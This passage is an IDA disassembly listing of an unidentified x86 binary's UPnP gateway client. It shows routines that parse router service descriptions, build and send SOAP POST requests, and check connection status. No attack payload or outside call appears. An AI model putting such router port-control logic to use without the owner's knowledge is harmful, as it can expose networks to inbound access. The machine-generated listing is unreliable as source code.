jnz short loc_9B1D09
mov edi, 80h
push edi
lea eax, [esi+504h]
push eax
lea eax, [esi+104h]
push eax
call sub_9B323A ; memcpy
push edi
lea eax, [esi+584h]
push eax
lea eax, [esi+184h]
push eax
call sub_9B323A ; memcpy
push edi
lea eax, [esi+604h]
push eax
lea eax, [esi+204h]
push eax
call sub_9B323A ; memcpy
add esi, 284h
jmp short loc_9B1D72
; ---------------------------------------------------------------------------
loc_9B1D09: ; CODE XREF: sub_9B1C76+48�j
push offset aUrnSchemasUp_1 ; "urn:schemas-upnp-org:service:WANIPConne"...
push ebx
call sub_9B3342 ; strcmp
test eax, eax
pop ecx
pop ecx
jz short loc_9B1D2B
push offset aUrnSchemasUp_2 ; "urn:schemas-upnp-org:service:WANPPPConn"...
push ebx
call sub_9B3342 ; strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_9B1D7D
loc_9B1D2B: ; CODE XREF: sub_9B1C76+A2�j
mov edi, 80h
push edi
lea eax, [esi+504h]
push eax
lea eax, [esi+304h]
push eax
call sub_9B323A ; memcpy
push edi
lea eax, [esi+584h]
push eax
lea eax, [esi+384h]
push eax
call sub_9B323A ; memcpy
push edi
lea eax, [esi+604h]
push eax
lea eax, [esi+404h]
push eax
call sub_9B323A ; memcpy
add esi, 484h
loc_9B1D72: ; CODE XREF: sub_9B1C76+91�j
push edi
push ebx
push esi
call sub_9B323A ; memcpy
add esp, 30h
loc_9B1D7D: ; CODE XREF: sub_9B1C76+B3�j
pop edi
pop ebx
loc_9B1D7F: ; CODE XREF: sub_9B1C76+10�j
; sub_9B1C76+2B�j
pop esi
retn
sub_9B1C76 endp
; =============== S U B R O U T I N E =======================================
sub_9B1D81 proc near ; DATA XREF: sub_9B1EDE+2E�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
push offset aUrlbase ; "URLBase"
push esi
call sub_9B3342 ; strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_9B1D9F
add esi, 80h
jmp short loc_9B1E01
; ---------------------------------------------------------------------------
loc_9B1D9F: ; CODE XREF: sub_9B1D81+14�j
push offset aServicetype ; "serviceType"
push esi
call sub_9B3342 ; strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_9B1DB8
add esi, 684h
jmp short loc_9B1E01
; ---------------------------------------------------------------------------
loc_9B1DB8: ; CODE XREF: sub_9B1D81+2D�j
push offset aControlurl ; "controlURL"
push esi
call sub_9B3342 ; strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_9B1DD1
add esi, 504h
jmp short loc_9B1E01
; ---------------------------------------------------------------------------
loc_9B1DD1: ; CODE XREF: sub_9B1D81+46�j
push offset aEventsuburl ; "eventSubURL"
push esi
call sub_9B3342 ; strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_9B1DEA
add esi, 584h
jmp short loc_9B1E01
; ---------------------------------------------------------------------------
loc_9B1DEA: ; CODE XREF: sub_9B1D81+5F�j
push offset aScpdurl ; "SCPDURL"
push esi
call sub_9B3342 ; strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_9B1E28
add esi, 604h
loc_9B1E01: ; CODE XREF: sub_9B1D81+1C�j
; sub_9B1D81+35�j ...
test esi, esi
jz short loc_9B1E28
push edi
mov edi, [esp+8+arg_8]
cmp edi, 80h
jl short loc_9B1E15
push 7Fh
pop edi
loc_9B1E15: ; CODE XREF: sub_9B1D81+8F�j
push edi
push [esp+0Ch+arg_4]
push esi
call sub_9B323A ; memcpy
add esp, 0Ch
mov byte ptr [esi+edi], 0
pop edi
loc_9B1E28: ; CODE XREF: sub_9B1D81+78�j
; sub_9B1D81+82�j
pop esi
retn
sub_9B1D81 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B1E2A proc near ; CODE XREF: sub_9B234F+1A9�p
var_208 = byte ptr -208h
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 208h
push ebx
push esi
push edi
push [ebp+arg_14]
call sub_9B322E ; strlen
cmp word ptr [ebp+arg_C], 50h
mov esi, dword_9A11D4
pop ecx
mov ebx, eax
mov [ebp+var_8], 0
jz short loc_9B1E67
movzx eax, word ptr [ebp+arg_C]
push eax
push offset aHu ; ":%hu"
lea eax, [ebp+var_8]
push 8
push eax
call esi ; dword_9A11D4
add esp, 10h
loc_9B1E67: ; CODE XREF: sub_9B1E2A+26�j
push [ebp+arg_10]
lea eax, [ebp+var_8]
push ebx
push eax
push [ebp+arg_8]
lea eax, [ebp+var_208]
push [ebp+arg_4]
push offset aPostSHttp1_1Ho ; "POST %s HTTP/1.1\r\nHost: %s%s\r\nUser-Agen"...
push 200h
push eax
call esi ; dword_9A11D4
mov edi, eax
lea eax, [edi+ebx]
push eax
mov [ebp+arg_C], eax
call dword_9A11BC ; malloc
mov esi, eax
add esp, 24h
test esi, esi
jz short loc_9B1ED9
push edi
lea eax, [ebp+var_208]
push eax
push esi
call sub_9B323A ; memcpy
push ebx
push [ebp+arg_14]
lea eax, [esi+edi]
push eax
call sub_9B323A ; memcpy
add esp, 18h
push 0
push [ebp+arg_C]
push esi
push [ebp+arg_0]
call dword_9A1270 ; send
push esi
mov edi, eax
call dword_9A11D0 ; free
pop ecx
mov eax, edi
loc_9B1ED9: ; CODE XREF: sub_9B1E2A+74�j
pop edi
pop esi
pop ebx
leave
retn
sub_9B1E2A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B1EDE proc near ; CODE XREF: sub_9B2260+65�p
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
mov eax, [ebp+arg_0]
and [ebp+var_4], 0
mov [ebp+var_24], eax
mov eax, [ebp+arg_4]
mov [ebp+var_18], eax
mov eax, [ebp+arg_8]
mov [ebp+var_14], eax
lea eax, [ebp+var_24]
push eax
mov [ebp+var_10], offset sub_9B1C1B
mov [ebp+var_C], offset sub_9B1C76
mov [ebp+var_8], offset sub_9B1D81
call sub_9B1C02
pop ecx
leave
retn
sub_9B1EDE endp
; =============== S U B R O U T I N E =======================================
sub_9B1F1B proc near ; CODE XREF: sub_9B234F+219�p
push ebx
push esi
push edi
mov edi, eax
mov esi, offset aContentLength ; "content-length"
xor eax, eax
loc_9B1F27: ; CODE XREF: sub_9B1F1B+2B�j
test edi, edi
jz short loc_9B1F51
mov dl, [esi]
mov bl, [ecx]
cmp dl, bl
jz short loc_9B1F40
movsx ebx, bl
movsx edx, dl
add ebx, 20h
cmp edx, ebx
jnz short loc_9B1F51
loc_9B1F40: ; CODE XREF: sub_9B1F1B+16�j
inc ecx
inc esi
dec edi
cmp byte ptr [esi], 0
jnz short loc_9B1F27
test edi, edi
jz short loc_9B1F51
cmp byte ptr [ecx], 3Ah
jz short loc_9B1F5C
loc_9B1F51: ; CODE XREF: sub_9B1F1B+E�j
; sub_9B1F1B+23�j ...
or eax, 0FFFFFFFFh
loc_9B1F54: ; CODE XREF: sub_9B1F1B+4D�j
; sub_9B1F1B+66�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_9B1F58: ; CODE XREF: sub_9B1F1B+46�j
test edi, edi
jz short loc_9B1F51
loc_9B1F5C: ; CODE XREF: sub_9B1F1B+34�j
inc ecx
dec edi
cmp byte ptr [ecx], 20h
jz short loc_9B1F58
jmp short loc_9B1F7A
; ---------------------------------------------------------------------------
loc_9B1F65: ; CODE XREF: sub_9B1F1B+64�j
cmp dl, 39h
jg short loc_9B1F54
test edi, edi
jz short loc_9B1F51
movsx edx, dl
lea eax, [eax+eax*4]
inc ecx
lea eax, [edx+eax*2-30h]
dec edi
loc_9B1F7A: ; CODE XREF: sub_9B1F1B+48�j
mov dl, [ecx]
cmp dl, 30h
jge short loc_9B1F65
jmp short loc_9B1F54
sub_9B1F1B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B1F83 proc near ; CODE XREF: sub_9B25D9+19C�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
xor edi, edi
xor esi, esi
xor edx, edx
cmp [ebp+arg_0], edi
jle loc_9B2025
loc_9B1F99: ; CODE XREF: sub_9B1F83+9C�j
lea eax, [esi+1]
mov cl, [ebx+eax-1]
cmp cl, 0Ah
mov [ebp+var_8], eax
jz short loc_9B1FBA
cmp cl, 0Dh
jz short loc_9B1FBA
cmp cl, 3Ah
jnz short loc_9B201A
test edi, edi
jnz short loc_9B201A
mov edi, esi
jmp short loc_9B201A
; ---------------------------------------------------------------------------
loc_9B1FBA: ; CODE XREF: sub_9B1F83+23�j
; sub_9B1F83+28�j
test edi, edi
jz short loc_9B2018
loc_9B1FBE: ; CODE XREF: sub_9B1F83+40�j
inc edi
cmp byte ptr [edi+ebx], 20h
jz short loc_9B1FBE
push 8
lea eax, [edx+ebx]
push offset aLocation ; "location"
push eax
mov [ebp+var_4], eax
call dword_9A11EC ; _memicmp
add esp, 0Ch
test eax, eax
jnz short loc_9B1FED
mov ecx, [ebp+arg_4]
lea eax, [edi+ebx]
mov [ecx], eax
mov eax, [ebp+arg_8]
jmp short loc_9B200F
; ---------------------------------------------------------------------------
loc_9B1FED: ; CODE XREF: sub_9B1F83+5B�j
push 2
push offset aSt ; "st"
push [ebp+var_4]
call dword_9A11EC ; _memicmp
add esp, 0Ch
test eax, eax
jnz short loc_9B2013
mov ecx, [ebp+arg_C]
lea eax, [edi+ebx]
mov [ecx], eax
mov eax, [ebp+arg_10]
loc_9B200F: ; CODE XREF: sub_9B1F83+68�j
sub esi, edi
mov [eax], esi
loc_9B2013: ; CODE XREF: sub_9B1F83+7F�j
mov eax, [ebp+var_8]
xor edi, edi
loc_9B2018: ; CODE XREF: sub_9B1F83+39�j
mov edx, eax
loc_9B201A: ; CODE XREF: sub_9B1F83+2D�j
; sub_9B1F83+31�j ...
mov esi, eax
cmp esi, [ebp+arg_0]
jl loc_9B1F99
loc_9B2025: ; CODE XREF: sub_9B1F83+10�j
pop edi
pop esi
leave
retn
sub_9B1F83 endp
; =============== S U B R O U T I N E =======================================
sub_9B2029 proc near ; CODE XREF: sub_9B2081+E0�p
; sub_9B2081+ED�p ...
cmp byte ptr [esi], 68h
push edi
mov edi, eax
jnz short loc_9B205A
cmp byte ptr [esi+1], 74h
jnz short loc_9B205A
cmp byte ptr [esi+2], 74h
jnz short loc_9B205A
cmp byte ptr [esi+3], 70h
jnz short loc_9B205A
cmp byte ptr [esi+4], 3Ah
jnz short loc_9B205A
cmp byte ptr [esi+5], 2Fh
jnz short loc_9B205A
cmp byte ptr [esi+6], 2Fh
jnz short loc_9B205A
push edi
push esi
push ebx
jmp short loc_9B2076
; ---------------------------------------------------------------------------
loc_9B205A: ; CODE XREF: sub_9B2029+6�j
; sub_9B2029+C�j ...
push ebx
call sub_9B322E ; strlen
cmp byte ptr [esi], 2Fh
pop ecx
jz short loc_9B206B
mov byte ptr [eax+ebx], 2Fh
inc eax
loc_9B206B: ; CODE XREF: sub_9B2029+3B�j
cmp eax, edi
jg short loc_9B207F
sub edi, eax
push edi
push esi
add eax, ebx
push eax
loc_9B2076: ; CODE XREF: sub_9B2029+2F�j
call dword_9A11E0 ; strncpy
add esp, 0Ch
loc_9B207F: ; CODE XREF: sub_9B2029+44�j
pop edi
retn
sub_9B2029 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B2081 proc near ; CODE XREF: sub_9B2260+96�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
lea eax, [edi+80h]
push eax
mov [ebp+var_8], eax
call sub_9B322E ; strlen
mov esi, eax
test esi, esi
pop ecx
jnz short loc_9B20AE
push [ebp+arg_8]
call sub_9B322E ; strlen
pop ecx
mov esi, eax
loc_9B20AE: ; CODE XREF: sub_9B2081+20�j
lea eax, [edi+404h]
inc esi
inc esi
push eax
mov [ebp+arg_4], esi
mov [ebp+var_4], esi
mov [ebp+var_C], eax
call sub_9B322E ; strlen
add esi, eax
lea eax, [edi+304h]
push eax
mov [ebp+var_10], eax
call sub_9B322E ; strlen
add [ebp+arg_4], eax
add edi, 104h
push edi
mov [ebp+var_14], edi
call sub_9B322E ; strlen
mov ebx, dword_9A11BC
add [ebp+var_4], eax
mov edi, [ebp+arg_0]
push esi
call ebx ; dword_9A11BC
push [ebp+arg_4]
mov [edi+4], eax
call ebx ; dword_9A11BC
push [ebp+var_4]
mov [edi], eax
call ebx ; dword_9A11BC
mov ebx, dword_9A11E0
mov [edi+8], eax
mov eax, [ebp+var_8]
add esp, 18h
cmp byte ptr [eax], 0
push esi
jz short loc_9B211E
push eax
jmp short loc_9B2121
; ---------------------------------------------------------------------------
loc_9B211E: ; CODE XREF: sub_9B2081+98�j
push [ebp+arg_8]
loc_9B2121: ; CODE XREF: sub_9B2081+9B�j
push dword ptr [edi+4]
call ebx ; dword_9A11E0
mov eax, [edi+4]
add esp, 0Ch
add eax, 7
push 2Fh
push eax
call dword_9A1144 ; strchr
test eax, eax
pop ecx
pop ecx
jz short loc_9B2141
mov byte ptr [eax], 0
loc_9B2141: ; CODE XREF: sub_9B2081+BB�j
push [ebp+arg_4]
push dword ptr [edi+4]
push dword ptr [edi]
call ebx ; dword_9A11E0
push [ebp+var_4]
push dword ptr [edi+4]
push dword ptr [edi+8]
call ebx ; dword_9A11E0
mov ebx, [edi+4]
mov eax, esi
mov esi, [ebp+var_C]
add esp, 18h
call sub_9B2029
mov eax, [ebp+arg_4]
mov esi, [ebp+var_10]
mov ebx, [edi]
call sub_9B2029
mov eax, [ebp+var_4]
mov esi, [ebp+var_14]
mov ebx, [edi+8]
call sub_9B2029
pop edi
pop esi
pop ebx
leave
retn
sub_9B2081 endp
; =============== S U B R O U T I N E =======================================
sub_9B2186 proc near ; CODE XREF: sub_9B2260+B6�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_9B21B3
push edi
push dword ptr [esi]
mov edi, dword_9A11D0
call edi ; dword_9A11D0
push dword ptr [esi+4]
and dword ptr [esi], 0
call edi ; dword_9A11D0
push dword ptr [esi+8]
and dword ptr [esi+4], 0
call edi ; dword_9A11D0
add esp, 0Ch
and dword ptr [esi+8], 0
pop edi
loc_9B21B3: ; CODE XREF: sub_9B2186+7�j
pop esi
retn
sub_9B2186 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B21B5 proc near ; CODE XREF: sub_9B15F5:loc_9B17D6�p
; sub_9B234F+268�p ...
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10Ch
mov eax, [ebp+arg_C]
cdq
mov ecx, 3E8h
idiv ecx
push esi
mov esi, [ebp+arg_0]
mov [ebp+var_108], esi
mov [ebp+var_10C], 1
mov [ebp+var_8], eax
imul edx, 3E8h
lea eax, [ebp+var_8]
push eax
push 0
push 0
lea eax, [ebp+var_10C]
push eax
push 40h
mov [ebp+var_4], edx
call dword_9A124C ; select
test eax, eax
jge short loc_9B2209
or eax, 0FFFFFFFFh
jmp short loc_9B221E
; ---------------------------------------------------------------------------
loc_9B2209: ; CODE XREF: sub_9B21B5+4D�j
jnz short loc_9B220F
xor eax, eax
jmp short loc_9B221E
; ---------------------------------------------------------------------------
loc_9B220F: ; CODE XREF: sub_9B21B5:loc_9B2209�j
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call dword_9A1258 ; recv
loc_9B221E: ; CODE XREF: sub_9B21B5+52�j
; sub_9B21B5+58�j
pop esi
leave
retn
sub_9B21B5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B2221 proc near ; CODE XREF: sub_9B2260+A8�p
var_40 = byte ptr -40h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 40h
push 0
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_40]
push eax
mov eax, [ebp+arg_4]
add eax, 484h
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
mov [ebp+var_40], 0
call sub_9B2909
lea eax, [ebp+var_40]
push eax
push offset aConnected ; "Connected"
call sub_9B3342 ; strcmp
add esp, 1Ch
neg eax
sbb eax, eax
inc eax
leave
retn
sub_9B2221 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B2260 proc near ; CODE XREF: sub_9A6E48+64�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 0Ch
xor eax, eax
cmp [ebp+arg_0], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
jnz short loc_9B2275
leave
retn
; ---------------------------------------------------------------------------
loc_9B2275: ; CODE XREF: sub_9B2260+11�j
push esi
mov esi, [ebp+arg_8]
push ebx
mov [ebp+var_4], 1
push edi
loc_9B2282: ; CODE XREF: sub_9B2260+DD�j
mov edi, [ebp+arg_0]
loc_9B2285: ; CODE XREF: sub_9B2260+D0�j
push [ebp+arg_10]
lea eax, [ebp+var_C]
push [ebp+arg_C]
push eax
push dword ptr [edi+4]
call sub_9B18FC
mov ebx, eax
add esp, 10h
test ebx, ebx
jz loc_9B232C
inc [ebp+var_8]
push 704h
push 0
push esi
call sub_9B3240 ; memset
push 0Ch
push 0
push [ebp+arg_4]
call sub_9B3240 ; memset
push esi
push [ebp+var_C]
push ebx
call sub_9B1EDE
push ebx
call dword_9A11D0 ; free
lea eax, [esi+284h]
push offset aUrnSchemasUpnp ; "urn:schemas-upnp-org:service:WANCommonI"...
push eax
call sub_9B3342 ; strcmp
add esp, 30h
test eax, eax
jz short loc_9B22EF
cmp [ebp+var_4], 3
jl short loc_9B231C
loc_9B22EF: ; CODE XREF: sub_9B2260+87�j
push dword ptr [edi+4]
push esi
push [ebp+arg_4]
call sub_9B2081
add esp, 0Ch
cmp [ebp+var_4], 2
jge short loc_9B234A
push esi
push [ebp+arg_4]
call sub_9B2221
test eax, eax
pop ecx
pop ecx
jnz short loc_9B234A
push [ebp+arg_4]
call sub_9B2186
pop ecx
loc_9B231C: ; CODE XREF: sub_9B2260+8D�j
push 704h
push 0
push esi
call sub_9B3240 ; memset
add esp, 0Ch
loc_9B232C: ; CODE XREF: sub_9B2260+3E�j
mov edi, [edi]
test edi, edi
jnz loc_9B2285
inc [ebp+var_4]
cmp [ebp+var_4], 3
jle loc_9B2282
xor eax, eax
loc_9B2345: ; CODE XREF: sub_9B2260+ED�j
pop edi
pop ebx
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_9B234A: ; CODE XREF: sub_9B2260+A2�j
; sub_9B2260+B1�j
mov eax, [ebp+var_4]
jmp short loc_9B2345
sub_9B2260 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B234F proc near ; CODE XREF: sub_9B2909+49�p
; sub_9B2A48+52�p ...
var_8F0 = byte ptr -8F0h
var_F0 = byte ptr -0F0h
var_70 = byte ptr -70h
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 8F0h
and [ebp+var_8], 0
push ebx
mov ebx, [ebp+arg_C]
push esi
mov esi, dword_9A11D4
push edi
push ebx
push [ebp+arg_8]
lea eax, [ebp+var_F0]
push offset aSS ; "%s#%s"
push 80h
push eax
call esi ; dword_9A11D4
mov edi, [ebp+arg_10]
add esp, 14h
test edi, edi
lea eax, [ebp+var_8F0]
jnz short loc_9B23A9
push ebx
push [ebp+arg_8]
push ebx
push offset a?xmlVersion1_0 ; "<?xml version=\"1.0\"?>\r\n<s:Envelope xmln"...
push 800h
push eax
call esi ; dword_9A11D4
add esp, 18h
jmp loc_9B2460
; ---------------------------------------------------------------------------
loc_9B23A9: ; CODE XREF: sub_9B234F+3E�j
push [ebp+arg_8]
push ebx
push offset a?xmlVersion1_1 ; "<?xml version=\"1.0\"?>\r\n<s:Envelope xmln"...
push 800h
push eax
call esi ; dword_9A11D4
add esp, 14h
lea eax, [ebp+eax+var_8F0]
jmp short loc_9B2417
; ---------------------------------------------------------------------------
loc_9B23C6: ; CODE XREF: sub_9B234F+CC�j
lea ecx, [eax+64h]
lea esi, [ebp+var_F0]
cmp esi, ecx
jbe short loc_9B2433
mov byte ptr [eax], 3Ch
inc eax
mov esi, edx
jmp short loc_9B23DF
; ---------------------------------------------------------------------------
loc_9B23DB: ; CODE XREF: sub_9B234F+94�j
mov [eax], cl
inc eax
inc esi
loc_9B23DF: ; CODE XREF: sub_9B234F+8A�j
mov cl, [esi]
test cl, cl
jnz short loc_9B23DB
mov esi, [edi+4]
mov byte ptr [eax], 3Eh
inc eax
test esi, esi
jz short loc_9B23FC
jmp short loc_9B23F6
; ---------------------------------------------------------------------------
loc_9B23F2: ; CODE XREF: sub_9B234F+AB�j
mov [eax], cl
inc eax
inc esi
loc_9B23F6: ; CODE XREF: sub_9B234F+A1�j
mov cl, [esi]
test cl, cl
jnz short loc_9B23F2
loc_9B23FC: ; CODE XREF: sub_9B234F+9F�j
mov byte ptr [eax], 3Ch
inc eax
mov byte ptr [eax], 2Fh
inc eax
jmp short loc_9B240A
; ---------------------------------------------------------------------------
loc_9B2406: ; CODE XREF: sub_9B234F+BF�j
mov [eax], cl
inc eax
inc edx
loc_9B240A: ; CODE XREF: sub_9B234F+B5�j
mov cl, [edx]
test cl, cl
jnz short loc_9B2406
mov byte ptr [eax], 3Eh
inc eax
add edi, 8
loc_9B2417: ; CODE XREF: sub_9B234F+75�j
mov edx, [edi]
test edx, edx
jnz short loc_9B23C6
mov cl, [ebx]
mov byte ptr [eax], 3Ch
inc eax
mov byte ptr [eax], 2Fh
inc eax
mov byte ptr [eax], 6Dh
inc eax
mov byte ptr [eax], 3Ah
inc eax
mov edx, ebx
jmp short loc_9B2444
; ---------------------------------------------------------------------------
loc_9B2433: ; CODE XREF: sub_9B234F+82�j
mov eax, [ebp+arg_18]
and dword ptr [eax], 0
jmp loc_9B24D5
; ---------------------------------------------------------------------------
loc_9B243E: ; CODE XREF: sub_9B234F+F7�j
mov [eax], cl
inc eax
inc edx
mov cl, [edx]
loc_9B2444: ; CODE XREF: sub_9B234F+E2�j
test cl, cl
jnz short loc_9B243E
lea ecx, [ebp+var_F0]
sub ecx, eax
push ecx
push offset aSBodySEnvelope ; "></s:Body></s:Envelope>\r\n"
push eax
call dword_9A11E0 ; strncpy
add esp, 0Ch
loc_9B2460: ; CODE XREF: sub_9B234F+55�j
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_70]
push eax
push [ebp+arg_4]
call sub_9B1801
add esp, 10h
test eax, eax
jz short loc_9B24D5
xor esi, esi
cmp [ebp+arg_0], esi
jge short loc_9B24DD
push esi
push 1
push 2
call dword_9A12AC ; socket
cmp eax, esi
mov [ebp+arg_0], eax
jl short loc_9B24D0
push [ebp+var_8]
mov [ebp+var_2C], 2
call dword_9A1294 ; ntohs
mov [ebp+var_2A], ax
lea eax, [ebp+var_70]
push eax
call dword_9A12B0 ; inet_addr
mov [ebp+var_28], eax
push 10h
lea eax, [ebp+var_2C]
push eax
push [ebp+arg_0]
call dword_9A1298 ; connect
test eax, eax
jge short loc_9B24DD
push [ebp+arg_0]
call dword_9A1284 ; closesocket
loc_9B24D0: ; CODE XREF: sub_9B234F+143�j
mov eax, [ebp+arg_18]
mov [eax], esi
loc_9B24D5: ; CODE XREF: sub_9B234F+EA�j
; sub_9B234F+12A�j
or eax, 0FFFFFFFFh
jmp loc_9B25D4
; ---------------------------------------------------------------------------
loc_9B24DD: ; CODE XREF: sub_9B234F+131�j
; sub_9B234F+176�j
lea eax, [ebp+var_8F0]
push eax
lea eax, [ebp+var_F0]
push eax
push [ebp+var_8]
lea eax, [ebp+var_70]
push eax
push [ebp+var_1C]
push [ebp+arg_0]
call sub_9B1E2A
add esp, 18h
test eax, eax
jg short loc_9B250C
or esi, 0FFFFFFFFh
jmp loc_9B25C9
; ---------------------------------------------------------------------------
loc_9B250C: ; CODE XREF: sub_9B234F+1B3�j
mov esi, [ebp+arg_18]
mov eax, [esi]
mov ebx, [ebp+arg_14]
or [ebp+var_18], 0FFFFFFFFh
or [ebp+var_10], 0FFFFFFFFh
and dword ptr [esi], 0
push 1388h
push eax
mov [ebp+var_C], ebx
mov [ebp+var_4], eax
push ebx
jmp loc_9B25B4
; ---------------------------------------------------------------------------
loc_9B2531: ; CODE XREF: sub_9B234F+272�j
sub [ebp+var_4], eax
add [ebp+var_C], eax
add [esi], eax
mov eax, [esi]
add eax, ebx
cmp ebx, eax
mov edi, ebx
mov [ebp+var_14], eax
jnb short loc_9B2595
mov al, [ebx]
loc_9B2548: ; CODE XREF: sub_9B234F+23B�j
and [ebp+arg_10], 0
cmp al, 0Dh
jz short loc_9B2563
mov ecx, edi
loc_9B2552: ; CODE XREF: sub_9B234F+212�j
cmp al, 0Dh
jz short loc_9B2563
cmp ecx, [ebp+var_14]
jnb short loc_9B2595
inc [ebp+arg_10]
inc ecx
mov al, [ecx]
jmp short loc_9B2552
; ---------------------------------------------------------------------------
loc_9B2563: ; CODE XREF: sub_9B234F+1FF�j
; sub_9B234F+205�j
mov eax, [ebp+arg_10]
mov ecx, edi
call sub_9B1F1B
test eax, eax
jle short loc_9B2574
mov [ebp+var_18], eax
loc_9B2574: ; CODE XREF: sub_9B234F+220�j
mov eax, [ebp+arg_10]
lea edi, [edi+eax+2]
mov al, [edi]
cmp al, 0Dh
jnz short loc_9B2587
cmp byte ptr [edi+1], 0Ah
jz short loc_9B258E
loc_9B2587: ; CODE XREF: sub_9B234F+230�j
cmp edi, [ebp+var_14]
jb short loc_9B2548
jmp short loc_9B2595
; ---------------------------------------------------------------------------
loc_9B258E: ; CODE XREF: sub_9B234F+236�j
sub edi, ebx
inc edi
inc edi
mov [ebp+var_10], edi
loc_9B2595: ; CODE XREF: sub_9B234F+1F5�j
; sub_9B234F+20A�j ...
mov ecx, [ebp+var_18]
test ecx, ecx
jle short loc_9B25A9
mov eax, [ebp+var_10]
test eax, eax
jle short loc_9B25A9
add eax, ecx
cmp [esi], eax
jge short loc_9B25C7
loc_9B25A9: ; CODE XREF: sub_9B234F+24B�j
; sub_9B234F+252�j
push 1388h
push [ebp+var_4]
push [ebp+var_C]
loc_9B25B4: ; CODE XREF: sub_9B234F+1DD�j
push [ebp+arg_0]
call sub_9B21B5
add esp, 10h
test eax, eax
jg loc_9B2531
loc_9B25C7: ; CODE XREF: sub_9B234F+258�j
xor esi, esi
loc_9B25C9: ; CODE XREF: sub_9B234F+1B8�j
push [ebp+arg_0]
call dword_9A1284 ; closesocket
mov eax, esi
loc_9B25D4: ; CODE XREF: sub_9B234F+189�j
pop edi
pop esi
pop ebx
leave
retn
sub_9B234F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B25D9 proc near ; CODE XREF: sub_9A6E48+3C�p
var_644 = byte ptr -644h
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = dword ptr -40h
var_34 = word ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 644h
push edi
push 11h
push 2
xor edi, edi
push 2
mov [ebp+var_4], edi
mov [ebp+var_24], 1
call dword_9A12AC ; socket
cmp eax, edi
mov [ebp+var_8], eax
jge short loc_9B2609
xor eax, eax
jmp loc_9B274F
; ---------------------------------------------------------------------------
loc_9B2609: ; CODE XREF: sub_9B25D9+27�j
push ebx
push esi
push 10h
lea eax, [ebp+var_34]
push edi
push eax
call sub_9B3240 ; memset
mov esi, dword_9A1294
add esp, 0Ch
cmp [ebp+arg_C], edi
mov [ebp+var_34], 2
mov ebx, 76Ch
jz short loc_9B2637
push ebx
call esi ; dword_9A1294
mov [ebp+var_32], ax
